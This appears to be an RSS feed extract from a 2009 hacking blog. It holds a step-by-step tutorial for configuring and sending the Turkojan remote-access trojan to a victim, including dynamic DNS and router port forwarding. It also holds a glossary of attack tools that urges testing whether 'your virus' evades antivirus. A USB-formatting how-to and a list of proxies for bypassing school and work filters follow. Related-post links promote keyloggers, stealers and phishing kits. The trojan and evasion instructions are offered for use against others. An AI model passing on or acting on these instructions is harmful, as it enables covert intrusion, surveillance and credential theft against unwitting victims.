		<comments>http://www.hackingaday.com/2009/12/turkojan-tutorial.html#comments</comments>
		<pubDate>Tue, 22 Dec 2009 03:06:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/22/turkojan-tutorial</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/turkojan-tutorial.html"><img align="left" hspace="5" width="125" src="http://img145.imageshack.us/img145/7548/noip.jpg" class="alignleft wp-post-image tfe" alt="" title="" /></a>Okay,&#160; friends I tried to make a tutorial for Turkojan, I&#8217;m including pictures.     Please, tell me if I did anything wrong   and I will correct it.So iam starting My tutorial      First, go to 
http://www.no-ip.com and make an account, then go to host/redirects and select [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/12/istealer-tutorial-download.html' rel='bookmark' title='Permanent Link: iStealer Tutorial + Download'>iStealer Tutorial + Download</a></li>
<li><a href='http://www.hackingaday.com/2009/10/tutorial-on-ardamax-3-0-keyloggers.html' rel='bookmark' title='Permanent Link: Tutorial On Ardamax 3.0 Keyloggers'>Tutorial On Ardamax 3.0 Keyloggers</a></li>
<li><a href='http://www.hackingaday.com/2008/10/hack-through-messenger.html' rel='bookmark' title='Permanent Link: Hack Through Messenger'>Hack Through Messenger</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><b>Okay,&#160; friends I tried to make a tutorial for Turkojan, I&#8217;m including pictures.     <br />Please, tell me if I did anything wrong <img src='http://www.hackingaday.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' title="Turkojan tutorial" />  and I will correct it.So iam starting My tutorial      <br />First, go to </b></p>
<p><code><a href="http://www.no-ip.com">http://www.no-ip.com</a></code> and make an account, then go to host/redirects and select Add Host, and follow the instructions on the picture below.    <br /><img alt="noip Turkojan tutorial" src="http://img145.imageshack.us/img145/7548/noip.jpg" width="781" height="475" title="Turkojan tutorial" />    <br />After that, go to command prompt and type in IPCONFIG, you should see a bunch of letters and numbers. Look for Standard-gateway and copy the IP adress, then go to your webbrowser and paste in the IP.    <br />You should get in a login prompt, type in your usename + password to your router, or look for the default by googling the name of it.    <br />Then look for the section where you can forward ports, go there and follow the instructions on the picture below.    <br /><img alt="namnlsr Turkojan tutorial" src="http://img119.imageshack.us/img119/7715/namnlsr.jpg" title="Turkojan tutorial" />    <br />After that, make the server and type in the name of the NO-IP adress and make the settings you want or just follow the pic below:    <br /><img alt="turkojan Turkojan tutorial" src="http://img228.imageshack.us/img228/5822/turkojan.jpg" width="801" height="495" title="Turkojan tutorial" />    <br />Then, open up the No-IP client you downloaded earlier.    <br />Login and chose what No-IP server you want, and it should be a happy smiley if you done correct.    <br />Send the server!    <br />After that, go to the client and press Start (I had trouble finding it the first time, so I made a picture. <img title="Tongue" border="0" alt=":P" src="http://hackhound.org/forum/Smileys/solosmileys/tongue.gif" />).    <br /><img alt="trurkojan1 Turkojan tutorial" src="http://img19.imageshack.us/img19/5623/trurkojan1.jpg" title="Turkojan tutorial" />    <br />So, this was my tutorial. Hope you enjoyed reading it</p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/12/istealer-tutorial-download.html' rel='bookmark' title='Permanent Link: iStealer Tutorial + Download'>iStealer Tutorial + Download</a></li>
<li><a href='http://www.hackingaday.com/2009/10/tutorial-on-ardamax-3-0-keyloggers.html' rel='bookmark' title='Permanent Link: Tutorial On Ardamax 3.0 Keyloggers'>Tutorial On Ardamax 3.0 Keyloggers</a></li>
<li><a href='http://www.hackingaday.com/2008/10/hack-through-messenger.html' rel='bookmark' title='Permanent Link: Hack Through Messenger'>Hack Through Messenger</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/turkojan-tutorial.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacking Terminology-Guide for Complete Noobs</title>
		<link>http://www.hackingaday.com/2009/12/hacking-terminology-guide-for-complete-noobs.html</link>
		<comments>http://www.hackingaday.com/2009/12/hacking-terminology-guide-for-complete-noobs.html#comments</comments>
		<pubDate>Mon, 21 Dec 2009 13:37:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/12/21/hacking-terminology-guide-for-complete-noobs</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/12/hacking-terminology-guide-for-complete-noobs.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/12/guy_hacking_a_computer_clipart_image-284x300.jpg?w=284" class="alignleft wp-post-image tfe" alt="" title="" /></a>This is a little tutorial ive written for complete noobs who don&#8217;t know anything about hacking, or for those who need help understanding the terminology.




Bot - A bot is a program that is ran secretly in the background of a customer&#8217;s computer. The bot connects to an IRC channel usually where a Bot Herder(its creator) [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/02/a-guide-to-hacking.html' rel='bookmark' title='Permanent Link: A Guide to Hacking'>A Guide to Hacking</a></li>
<li><a href='http://www.hackingaday.com/2009/11/complete-guide-on-phishing-phishing-pack-2009.html' rel='bookmark' title='Permanent Link: Complete guide on phishing &#8211; Phishing Pack 2009'>Complete guide on phishing &#8211; Phishing Pack 2009</a></li>
<li><a href='http://www.hackingaday.com/2009/08/downloada-set-of-phishers-for-almost-all-websites-and-also-a-phisher-guide.html' rel='bookmark' title='Permanent Link: Download:A Set of Phishers for almost all Websites and also a Phisher Guide !'>Download:A Set of Phishers for almost all Websites and also a Phisher Guide !</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div style="font-family:&quot;text-align:justify;">This is a little tutorial ive written for complete noobs who don&#8217;t know anything about hacking, or for those who need help understanding the terminology.</div>
<div style="font-family:&quot;text-align:justify;"></div>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/12/guy_hacking_a_computer_clipart_image-284x300.jpg" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/12/guy_hacking_a_computer_clipart_image-284x300.jpg?w=284" title="Hacking Terminology Guide for Complete Noobs" alt=" Hacking Terminology Guide for Complete Noobs" /></a></div>
<div style="font-family:&quot;text-align:center;"></div>
<div style="font-family:&quot;text-align:justify;"></div>
<div style="font-family:&quot;text-align:justify;"><span style="color:purple;">Bot </span>- A bot is a program that is ran secretly in the background of a customer&#8217;s computer. The bot connects to an IRC channel usually where a Bot Herder(its creator) can use a number of commands to control these computers that are now it&#8217;s under control. A zombie computer(a pc under control of a bot herder) can be manipulated in a number of ways. Some functions of a bot include stealing customers passwords, Password Recovery Tool, ddosing a server to cause it to crash, turning on the webcam and being able to watch the zombie computer&#8217;s users, visiting a website(to gain money + traffic for a bot herder), clicking ads, making ads appear randomly, destroying itself(the pc), and sending spam to email contacts.</p>
<p><b><span style="color:purple;">serverNET</span></b> &#8211; A bunch of bot&#8217;s connected to a server (usually IRC or web) that can be controlled and manipulated by its owner.</p>
<p><b><span style="color:purple;">RAT</span></b> (Remote Administration Tool) &#8211; Sort of like a serverNET in regards that you can gain acess to the customers computer and do stuff like look at their files, webcam, etc. Only this malware connects back to you, apposed to a server.</div>
<div style="font-family:&quot;text-align:justify;"><b><span style="color:purple;">Crypter</span></b> &#8211; A crypter is used to make well known hacker&#8217;s viruses (such as keyloggers and botnets) undetectable by anti-virus software by changing the virus program signatures that anti virus programs have in their databases to make them easier to spread.</p>
<p><b><span style="color:purple;">Binder</span></b> &#8211; A binder is used to bind a virus(such as a Password Recovery Tool,etc) to another program making it undetechtable and able to fool users into thinking its something else. (IE a customer will click an installPhotoshop.exe and it will install photoshop as well as your virus secretly.)</p>
<p><b><span style="color:purple;">FUD</span></b> &#8211; Term for fully undetectable virus. (made by either coding your own virus or by crypting and binding an existing virus) Use <a class="bbc_link new_win" href="http://novirusthanks.com/" target="_blank">http://novirusthanks.com</a> (uncheck distribute sample) to check if your virus is undetectable.</p>
</div>
<div style="font-family:&quot;text-align:justify;">Database &#8211; Used by most websites to store things such as User names, Passwords, Email, etc of an entire website or community.<br /><span style="color:purple;"><br /><b>SQL Injection</b></span> &#8211; A way of manipulating a website&#8217;s forms as a way of retrieving it&#8217;s databases. This can be used to find users and passwords as well as obtaining admin on a website in order to deface it.<br />XSS (Cross Site Scripting) &#8211; a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. (From Wikipedia)</p>
<p><b><span style="color:purple;">Password Recovery Tool</span></b> &#8211; A Password Recovery Tool is a program, usualy ran secretly in the background that records what users type, then the typed output is usually sent via email or uploaded by the Password Recovery Tool somewhere to the web in secret. These can be attached to other executables so you never even know you ran them in the first place, once you click it once it often is started at startup from their on.</p>
<p><b><span style="color:purple;">Cookie Stealing/Spoofing</span></b> &#8211; Used to fool a customer into clicking a link that will steal their cookies to websites which you can then use to have their privileges to various parts of a website or forum.<br />BruteForcer &#8211; Program used to crack passwords by trying every password/password list on various forms.</p>
<p><b><span style="color:purple;">Hashes</span> </b>- How passwords are usually stored, this is a way of crypting a password so it is not plain text, harder passwords are very hard to crack but simple ones have often been cracked and can be found on online databases. Some common password hashes include MD5 and SHA.</p>
<p><b><span style="color:purple;">Social Engineering</span></b> &#8211; Tricking a customer into doing something you want them to do by disguising or enticing them into doing what you want.</p>
<p><span style="color:purple;"><b>Phishing</b> </span>- Creating a fake login page to a well known website (IE Facebook) and then fooling a customer into entering their information on the fake login page through social engineering. </div>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/02/a-guide-to-hacking.html' rel='bookmark' title='Permanent Link: A Guide to Hacking'>A Guide to Hacking</a></li>
<li><a href='http://www.hackingaday.com/2009/11/complete-guide-on-phishing-phishing-pack-2009.html' rel='bookmark' title='Permanent Link: Complete guide on phishing &#8211; Phishing Pack 2009'>Complete guide on phishing &#8211; Phishing Pack 2009</a></li>
<li><a href='http://www.hackingaday.com/2009/08/downloada-set-of-phishers-for-almost-all-websites-and-also-a-phisher-guide.html' rel='bookmark' title='Permanent Link: Download:A Set of Phishers for almost all Websites and also a Phisher Guide !'>Download:A Set of Phishers for almost all Websites and also a Phisher Guide !</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/12/hacking-terminology-guide-for-complete-noobs.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Format USB Drive(Pen Drive) using Command prompt</title>
		<link>http://www.hackingaday.com/2009/09/format-usb-drivepen-drive-using-command-prompt.html</link>
		<comments>http://www.hackingaday.com/2009/09/format-usb-drivepen-drive-using-command-prompt.html#comments</comments>
		<pubDate>Tue, 22 Sep 2009 15:59:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[USB]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/09/22/format-usb-drivepen-drive-using-command-prompt</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/09/format-usb-drivepen-drive-using-command-prompt.html"><img align="left" hspace="5" width="125" src="http://rkmalar.files.wordpress.com/2009/03/pendrive_usbbluedongle.jpg" class="alignleft wp-post-image tfe" alt="" title="" /></a>Formatting a pendrive i not something new.But formatting through DOS is something different and new.So now you can just follow the below steps to format your pendrive in seconds
How to format USB?

First go to command prompt(Start &#62; Run &#62; CMD)
Then C:/documents and settings Command prompt will appear.
Then type format x (x is the driver letter) [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/command-prompt-tricks-2.html' rel='bookmark' title='Permanent Link: Command Prompt Tricks'>Command Prompt Tricks</a></li>
<li><a href='http://www.hackingaday.com/2008/09/command-prompt-tricks.html' rel='bookmark' title='Permanent Link: Command Prompt Tricks'>Command Prompt Tricks</a></li>
<li><a href='http://www.hackingaday.com/2009/07/create-3-simple-fake-viruses-using-command-prompt-and-visual-basic.html' rel='bookmark' title='Permanent Link: Create 3 Simple Fake Viruses using Command Prompt and Visual Basic'>Create 3 Simple Fake Viruses using Command Prompt and Visual Basic</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://rkmalar.files.wordpress.com/2009/03/pendrive_usbbluedongle.jpg"><img src="http://rkmalar.files.wordpress.com/2009/03/pendrive_usbbluedongle.jpg" border="0" alt="pendrive usbbluedongle Format USB Drive(Pen Drive) using Command prompt"  title="Format USB Drive(Pen Drive) using Command prompt" /></a>Formatting a pendrive i not something new.But formatting through DOS is something different and new.So now you can just follow the below steps to format your pendrive in seconds</p>
<p><span style="font-weight:bold;">How to format USB?</span></p>
<ul>
<li>First go to command prompt(Start &gt; Run &gt; CMD)</li>
<li>Then C:/documents and settings Command prompt will appear.</li>
<li>Then type format x (x is the driver letter) and press ENTER</li>
<li>After that you have to enter the volume label of the pen drive correctly and press ENTER.</li>
<li>Then a prompt will appear.Select Y (yes) command.</li>
<li>Format will start.</li>
<li>Then after the process is over your drive is fresh and ready to be written !</li>
</ul>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/command-prompt-tricks-2.html' rel='bookmark' title='Permanent Link: Command Prompt Tricks'>Command Prompt Tricks</a></li>
<li><a href='http://www.hackingaday.com/2008/09/command-prompt-tricks.html' rel='bookmark' title='Permanent Link: Command Prompt Tricks'>Command Prompt Tricks</a></li>
<li><a href='http://www.hackingaday.com/2009/07/create-3-simple-fake-viruses-using-command-prompt-and-visual-basic.html' rel='bookmark' title='Permanent Link: Create 3 Simple Fake Viruses using Command Prompt and Visual Basic'>Create 3 Simple Fake Viruses using Command Prompt and Visual Basic</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/09/format-usb-drivepen-drive-using-command-prompt.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>List of Best Proxy Servers available on the Internet</title>
		<link>http://www.hackingaday.com/2009/09/list-of-best-proxy-servers-available-on-the-internet.html</link>
		<comments>http://www.hackingaday.com/2009/09/list-of-best-proxy-servers-available-on-the-internet.html#comments</comments>
		<pubDate>Tue, 22 Sep 2009 15:40:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Proxy]]></category>
		<category><![CDATA[Tricks]]></category>
		<category><![CDATA[Tutorials]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/09/22/list-of-best-proxy-servers-available-on-the-internet</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/09/list-of-best-proxy-servers-available-on-the-internet.html"><img align="left" hspace="5" width="125" src="http://www.opengiga.com/wp-content/uploads/2008/03/proxy_review3.jpg" class="alignleft wp-post-image tfe" alt="" title="" /></a>What is a Proxy server ?
In computer networks, a proxy server is a server (a computer system or an application program) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/06/how-to-bypass-all-webfilters.html' rel='bookmark' title='Permanent Link: How to Bypass all Webfilters'>How to Bypass all Webfilters</a></li>
<li><a href='http://www.hackingaday.com/2009/10/how-to-access-blocked-web-sites.html' rel='bookmark' title='Permanent Link: How To Access Blocked Web Sites ??'>How To Access Blocked Web Sites ??</a></li>
<li><a href='http://www.hackingaday.com/2009/09/teamviewerhack-any-remote-servers-or-pcs.html' rel='bookmark' title='Permanent Link: TeamViewer:Hack any Remote Servers or PCs'>TeamViewer:Hack any Remote Servers or PCs</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.opengiga.com/wp-content/uploads/2008/03/proxy_review3.jpg"><img src="http://www.opengiga.com/wp-content/uploads/2008/03/proxy_review3.jpg" border="0" alt="proxy review3 List of Best Proxy Servers available on the Internet"  title="List of Best Proxy Servers available on the Internet" /></a><b>What is a Proxy server ?</b></p>
<p>In computer networks, a proxy server is a server (a computer system or an application program) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. If the request is validated by the filter, the proxy provides the resource by connecting to the relevant server and requesting the service on behalf of the client. A proxy server may optionally alter the client&#8217;s request or the server&#8217;s response, and sometimes it may serve the request without contacting the specified server. In this case, it &#8216;caches&#8217; responses from the remote server, and returns subsequent requests for the same content directly.(Wikipedia)</p>
<p><b>So here is the List of best anonymizers and proxy servers o bypass webfilters !</b></p>
<p><span style="font-weight:bold;">Anonymouse</span> &#8211; a very good free anonymizer. By using this CGI proxy you can anonymously surf web pages, send anonymous e-mails and look at news.<br />URL (for proxy chaining):<br />http://anonymouse.ws/</p>
<p><b>ShadowBrowser</b> &#8211; anonymously surf the internet and protect your Internet history at the same time. No software to download and supports SSL websites.</p>
<p><b>www.ProxyKing.ne</b>t &#8211; This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.<br />URL (for making proxy chaining):<br />http://www.proxyking.net/</p>
<p><b>AnonymousIndex.com</b> &#8211; Anonymous private surfing service, hide your ip, manage website ads, referrers and cookies through this free web based proxy.<br />URL (for proxy chaining):<br />http://www.anonymousindex.com</p>
<p><b>www.HideMyAss.com</b> &#8211; Free anonymous browsing, for the times when you REALLY need to hide your ass online!<br />URL (for proxy chaining):<br />http://www.hidemyass.com/</p>
<p><b>Proxy7.com</b> &#8211; Free webbased proxy. By using this proxy you can surf the Internet securely and safely. This anonymizer service keeps websites from tracking your internet movements by preventing them from placing cookies on your home computer.<br />URL (for proxy-chains):<br />http://www.proxy7.com/</p>
<p><b>www.ProxyFoxy.com</b> &#8211; Proxy Foxy offers you free anonymous surfing. With our free tool you can surf the Internet safe and secure without revealing your identity. Avoid cookies, spyware and other malicious scripts.<br />URL (for making proxy chaining):<br />http://www.proxyfoxy.com/</p>
<p><b>78Y.NET</b> &#8211; It is a web anonymous web proxy designed to bypass proxy restrictions through a web interface. If, for example, in your university, college, job, etc, the IT department blocks a lot of harmless websites simply because of their popularity, so you can use 78Y.NET proxy service to access those websites.<br />URL (to create proxy chains):<br />http://www.78y.net/</p>
<p><b>www.75i.net </b>- 75I.NET is anonymous CGI Proxy that allows anyone to surf the Internet privately and securely without any restrictions. 75I.NET anonymous web surfing proxy service is free.<br />URL (to create chains of proxies):<br />http://www.75i.net/</p>
<p><b>www.dzzt.com</b> &#8211; This anonymizer always hides your IP address, so all sites will not be able to uniquely your identify or track you. You&#8217;re able to access from your school, college, university, etc, the websites, which are restricted by your IT department.<br />URL (for proxy chaining):<br />http://www.dzzt.com/</p>
<p><b>Proxy Guy</b> &#8211; The Proxy Guy offers free anonymous surfing. Now you can surf safe and secure with the click of a button.<br />URL (for making proxy chaining):<br />http://www.proxyguy.com/</p>
<p><b>www.GamesProxy.com</b> &#8211; Games Proxy helps you to play all your favourite flash games free online by using fast secure web proxy. Apart from playing free flash games you can also use Games Proxy to browse all your favourite sites such as ebay, hotmail &amp; more!</p>
<p><b>www.proxyz.be</b> &#8211; It is a free internet service which allows you to surf anonymously and it &#8220;changes&#8221; your ip. You can also use it to access/bypass blocked websites on your school or office.<br />URL (for making proxy chaining):<br />http://www.proxyz.be/</p>
<p><b>www.antifw.tk</b> &#8211; Anti-firewall redirector. It allows to hide your IP and a name and a type of the file you gets from internet. Now corporate internet firewall will not be able to determine your internet activity.</p>
<p><b>www.ProxyHero.com</b> &#8211; Fast and Secure US Proxy. PHP Based, and very easy to use. Completely free, and will keep you anonymous while browsing the internet.<br />URL (for making proxy chaining):<br />http://www.proxyhero.com/</p>
<p><b>www.ProxyDrop.com</b> &#8211; This is a free CGI proxy with HTTPS support. This service also includes the usual features including removing client side scripting, showing text only and enabling or disabling cookies. It also supports rotate13 or base64 URL encoding. Mirror1 Mirror2 Mirror3 Mirror4<br />URL (for making proxy chaining):<br />http://www.proxydrop.com/<br />http://www.proxydrop.net/<br />http://www.proxydrop.biz/<br />http://www.proxydrop.info/<br />http://www.proxydrop.org/</p>
<p><b>www.prx1.com</b> &#8211; This is a free, safe, anonymous web proxy with configurable options. Browsing anonymously with prx1.com increases your security and lets you access web sites from behind a firewall.<br />URL (for making proxy chains):<br />http://www.prx1.com/</p>
<p><b>www.ninjaproxy.com</b> &#8211; It is a free anonymous web based proxy service. With Ninja Proxy you can browse your favorite web sites anonymously and even from behind a firewall with blocked ports.<br />URL (for making proxy chains):<br />http://www.ninjaproxy.com/</p>
<p><b>ShadowSurf free anonymous proxy</b> &#8211; Surf privately and 100% anonymously with ShadowSurf&#8217;s FREE web proxy. You can access blocked sites while keeping your IP secret. No software needed.<br />URL (for making proxy chaining):<br />http://www.shadowsurf.com/</p>
<p><b>Famous5.net Proxy</b> &#8211; Free browser based anonymizer without any software. Bypass bans and hide your ip through famous5.net proxy.<br />URL (for making proxy chains):<br />http://www.famous5.net/</p>
<p><b>No1Proxy.com</b> &#8211; Free proxy site with a cgi proxy tool, daily updated proxy lists and information on anonymous and https proxy servers.<br />URL (for creating proxy chain):<br />http://www.no1proxy.com/</p>
<p><b>ProxySpy.com</b> &#8211; Proxy Spy protects your privacy and keeps your computer secure by allowing you without revealing your IP address or personal information. Proxy Spy has a range of features including disabling javascript, encoding URLs to bypass filters, disable showing of images, reject cookies etc. Proxy Spy is hosted on a fast server with high uptime &#8211; this means you can always count on it, day or night, to protect you.</p>
<p><b>TheProxy.be</b> &#8211; TheProxy always hides your IP address, so all sites will not be able to uniquely your identify or track you. It`s absolutely free. Mirror Mirror1<br />URL (for making proxy chains):<br />http://www.theproxy.be/<br />http://www.newproxy.be/<br />http://www.smartproxy.net/</p>
<p><b>ProxyPrince.com</b> &#8211; Very fast US based PHP proxy. Very easy to use, and very quick. ProxyPrince will keep you safe and secure. Anonimity is our main concern, your tracks are sure to be kept hidden.</p>
<p><b>PimpMyIP.com</b> &#8211; Free anonymous web proxy. Bypass blocked websites and browse privately at work or school. Shields you against cookies, spyware and malicious scripts.</p>
<p><b>OhMyProxy.com</b> &#8211; Free Anonymous Browsing. Hide your IP and get past school and<br />
 work filters.</p>
<p><b>Clever Proxy</b> &#8211; Clever Proxy is a smart and intelligent web-based proxy service. It allows you to remain anonymous whilst using the internet. By using this anonymizer you will also be protecting your computer because when you surf anonymously people cannot find out your IP address and attempt to hack you.</p>
<p><b>A Proxy Site</b> &#8211; A Proxy Site is a simple and reliable web-based anonymizer. By using it you can bypass filters and remain completely anonymous whilst surfing the internet. It has many features including blocking JavaScript and cookies.</p>
<p><b>Fully Sick Proxy</b> &#8211; Fully Sick proxy allows you to remain anonymous on the internet by routing web requests for you. This means you can stay protected and also disable javascript and block cookies. Our site is fast and reliable too.</p>
<p><b>Desire Proxy</b> &#8211; Desire proxy is a premium free anonymous proxy. It provides many of the features of the paid services for nothing! These include cookie removal, no image browsing and more. Keep anonymous and keep secure with Desire Proxy. We know what you desire!</p>
<p><b>Perfect Proxy</b> &#8211; Perfect Proxy is just that &#8211; perfect! It provides excellent reliability and website support and also keeps you anonymous in the process. It has many additional features to add to the experience.<br /><b><br />Prime Proxy</b> &#8211; Prime Proxy provides a great free proxy service to the general public. It keeps you anonymous and safe whilst browsing your favorite websites. Prime Proxy is used by students and adults in many different situations. Try us today &#8211; it&#8217;s 100% free!</p>
<p><b>Proxy Aware</b> &#8211; Since you&#8217;re visiting freeproxy.ru you must be proxy aware, so why not check out Proxy Aware? It&#8217;s a perfect free proxy which keeps you anonymous whilst browsing the web! It has many additional features such as cookie blocking, disabling images and URL encoding to bypass school and work filters.</p>
<p><b>Proxy Craze</b> &#8211; At the moment there is a proxy craze going on, and Proxy Craze is proud to be part of it! With a delicious serving of features to make any proxy user cry, Proxy Craze is the proxy of choice! Features include URL encoding, cookie blocking / image blocking, and a neat interface!</p>
<p><b>Proxy Gasp</b> &#8211; Our proxy is so good it will make you gasp &#8211; as the name suggests. To use this proxy simply type the URL into the website and gasp.your at the site remaining totally anonymous! This means websites cannot record your IP and later use it to hack or send you junk!</p>
<p><b>Proxy Please</b> &#8211; Well, thanks for saying please! This is a great proxy site with all the usual features including cookie blocking, no images, URL encoding all whilst being extremely fast and reliable. If you want to bypass filters then this is the site you need!</p>
<p><b>Some Proxy</b> &#8211; Easy to remember domain, great features, and nice and fast! Keeps you totally anonymous whilst browsing the internet, and allows you to bypass filters and school or at work. Features include URL encoding and cookie blocking!</p>
<p><b>Stupid Proxy</b> &#8211; Despite the name, this proxy is anything but stupid! If you&#8217;re going to use a proxy, use Stupid Proxy! It&#8217;s no frills yet great to use including many simple features that will make your life easier including URL encoding (bypass filters) and imageless browsing. Enjoy!</p>
<p><b>That Proxy</b> &#8211; Which proxy &#8211; this proxy? Why not! A bunch of excellent features, fast and reliable and a clean and neat design are all reasons why you should choose &#8216;That Proxy&#8217;! By using our site you will remain anonymous and avoid security issues like people hacking your computer.</p>
<p><b>Want Proxy</b> &#8211; For you to be at this site you must want some proxy, so all you need to do is type that in, and finish it with a .com, and you&#8217;re done! &#8216;Want Proxy&#8217; is an excellent proxy site that you&#8217;ll end up using all the time. It&#8217;s a favorite amongst students and workers who want to bypass filters.</p>
<p><b>www.UnBlockMySpace.com</b> &#8211; Unblock MySpace is a free service created to view MySpace proxy website from school and work computers through a PHP and CGI backend (web based proxy). This site uses the server proxy IP for surfing the web anonymously. Protect your privacy! Surf Anonymously! Bypass Security Filters! Private Browsing!</p>
<p><b>www.ProxyForAll.com</b> &#8211; Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.</p>
<p><b>www.MyProxySurfer.com</b> &#8211; Free and secure cgi web based proxy site. Surf the net from Work, school or home. Keep your info safe from hackers.</p>
<p><b>www.ProxyCat.com</b> &#8211; Proxycat.com is a free easy to use cgi proxy service that blocks cookies and hides your IP to keep you anonymous as you surf the web.</p>
<p><b>www.ProxyDetective.com</b> &#8211; ProxyDetective &#8211; Simple and Free cgi-webbased anonymous proxy surfing. Surf safely from your work, school or home.</p>
<p><b>www.indianproxy.com</b> &#8211; Access your webmail, myspace, and much more in school or work anonymously.</p>
<p><b>www.proxybrowsing.com</b> &#8211; Access blocked websites in school or work safely and anonymously. Surf with Ad Free Browsing Pages!</p>
<p><b>www.ProxyPi.com</b> &#8211; We do not sleep until you have a safe route. Use us at school, work or home. We can bypass most filters.</p>
<p><b>www.proxyjet.com</b> &#8211; Hide your movements via our anonymous proxy. Our proxy will bypass school and work filters.</p>
<p><b>www.justhide.com</b> &#8211; We allow you to bypass your school and work filters to allow you surf the internet anonymously.<br />Other anonymizers</p>
<p><b>Anonymization</b> &#8211; free web anonymyzer. Supports anonymous web surfing, anonymous web seek (meta search by many search engines) and FTP surf &#8211; surf anonymously in any FTP server. By using this web proxy you can surf anonymously more than 5.000.000.000 web pages.<br />URL (for proxy chaining):<br />http://www.anonymization.net/</p>
<p><b>Guardster</b> &#8211; good anonymizer. Controls cookies, scripts, ADs, images and referrers.<br />URL (for proxy chaining):<br />http://www.guardster.com/</p>
<p><b>ProxyWeb</b> &#8211; good anonymizer, can delete Java, JavaScript, cookies and ActiveX. Also this web proxy uses HTTPS (secure) connection &#8211; so nobody can detect what you download from Internet.<br />URL (for proxy chaining):<br />http://www.proxyweb.net/</p>
<p><b>WebWarper</b> &#8211; This is a popular free web anonymizer. This CGI proxy can pack web pages &#8220;on the fly&#8221;.<br />URL (for proxy chaining):<br />http://webwarper.net/</p>
<p>MegaProxy &#8211; Free anonymizer can work with HTTPS sites.<br />URL (for proxy chaining):<br />http://www.megaproxy.com/<br />http://www.amegaproxy.com/</p>
<p>W3Privacy.com &#8211; free web based anonymizing proxy. Instant access, no download, no registration, and no fee required.<br />URL (for proxy chaining):<br />http://www.w3privacy.com/</p>
<p>Anonymizer.RU &#8211; russian anonymizer: this russian CGI proxy has many additional options only after registration.<br />URL (for proxy chaining):<br />http://www.anonymizer.ru/</p>
<p><b>The-cloak</b> &#8211; This is a free CGI proxy. This anonymizer supports HTTP, FTP and HTTPS sessions. Can hide referrers. Requires payment..<br />URL (for chaining proxy):<br />http://www.the-cloak.com/</p>
<p>Pure privacy &#8211; cool anonymizer + remailer. You can use this anonymizer to send anonymous e-mails (by using this anonymizer with anonymous proxy)<br />URL (for proxy chaining):<br />http://www.pureprivacy.com/</p>
<p><b>Proxify.com</b> &#8211; Good fast anonymizer that can remove cookies, ADs, referrers and can use HTTPS connections.<br />URL (for proxy chaining):<br />http://proxify.com/</p>
<p><b>http://www.urlencoded.com/</b> &#8211; The better cgi proxy server. It has many different features, inclusive enabling / disabling cookies, all scripts, AD banners, referrer information, browser and OS info and many more.<br />URL (for cgi proxy chaining):<br />http://www.urlencoded.com/</p>
<p><b>http://www.snoopblocker.com/</b> &#8211; Good cgi proxy (anonymizer). It uses 128-bit SSL-encoding. Ca<br />
n enable/lock Java, JavaScript, Cookies, ActiveX.<br />URL (for creating anonymizers chain):<br />http://www.snoopblocker.com/</p>
<p>http://www.long999.com/ &#8211; Mirror</p>
<p>www.psurf.net &#8211; Psurf is one of the fatest proxy services on the net. Using new and advanced technology to help you bypass your school firewalls and filters. Allowing you to view what you want, when you want!</p>
<p>http://www.phproxy.info/ &#8211; mirror1 mirror2 mirror3</p>
